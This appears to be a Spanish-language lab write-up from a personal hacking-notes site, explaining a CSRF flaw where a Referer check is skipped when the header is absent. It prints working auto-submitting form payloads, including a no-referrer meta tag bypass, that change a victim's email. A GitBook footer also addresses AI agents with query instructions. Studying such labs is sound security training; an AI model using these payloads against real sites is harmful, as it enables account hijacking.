> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/csrf/csrf-referer-validation-depends-on-header-presence.md).

# CSRF con validación de Referer solo cuando está presente

### CSRF donde la validación del Referer depende de que el encabezado esté presente

La funcionalidad de cambio de correo electrónico de este laboratorio es vulnerable a un ataque CSRF. El servidor intenta bloquear las solicitudes entre dominios comprobando el encabezado **Referer**, pero hay un mecanismo de respaldo inseguro que acepta la consulta si falta el encabezado Referer.

* Cuenta recomendada: `wiener:peter` (usa esta cuenta para reproducir el escenario de la víctima).

El servidor comprueba el **Referer** campo para averiguar de dónde proviene la solicitud y rechaza las solicitudes cuyo Referer no es el del sitio.

<figure><img src="/files/12cc2381fb7c9402bd34a6e9bb791b5faee19af3" alt="" width="543"><figcaption></figcaption></figure>

* Al enviar un formulario POST desde el servidor de explotación, la respuesta devuelve: **"Encabezado Referer no válido"** — la comprobación funciona cuando el encabezado está presente y es incorrecto.

```html
<form class="login-form" name="change-email-form" action="https://0a2300750347b0c680ee030e005f0042.web-security-academy.net/my-account/change-email" method="POST">
    <input type="hidden" name="email" value="hacked@jord4n.pro">
</form>

<script>

document.forms[0].submit();
</script>
```

`"Encabezado Referer no válido"`

<figure><img src="/files/e3413d4673ac5d249e583221514e998a55b94c15" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/7675ed6ef0631eb3be00e2bb74bfe86a32606c1c" alt=""><figcaption></figcaption></figure>

Sin embargo, si la solicitud llega **sin** sin el encabezado Referer, el servidor acepta la solicitud (comportamiento de respaldo peligroso).

<figure><img src="/files/89ef20e7fe7d97820fb539444aeb8e5e1a5110b8" alt=""><figcaption></figcaption></figure>

#### Método de operación (principio)

1. Aloja una página en el servidor de explotación que envíe un formulario POST a `/my-account/change-email` con el correo electrónico del atacante.
2. Haz que la página de exploit **elimine** el encabezado Referer del navegador para que la validación falle como bloqueo (ya que el servidor acepta la ausencia de Referer).
3. Una forma sencilla de pedirle al navegador que no envíe el Referer es añadir una `<meta name="referrer" content="no-referrer">` etiqueta a la página de exploit antes de enviar el formulario.

```html
<head>
   <meta name="referrer" content="no-referrer">
</head>
<form class="login-form" name="change-email-form" action="https://0a2300750347b0c680ee030e005f0042.web-security-academy.net/my-account/change-email" method="POST">
    <input type="hidden" name="email" value="hacked@jord4n.pro">
</form>

<script>

document.forms[0].submit();
</script>
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/csrf/csrf-referer-validation-depends-on-header-presence.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
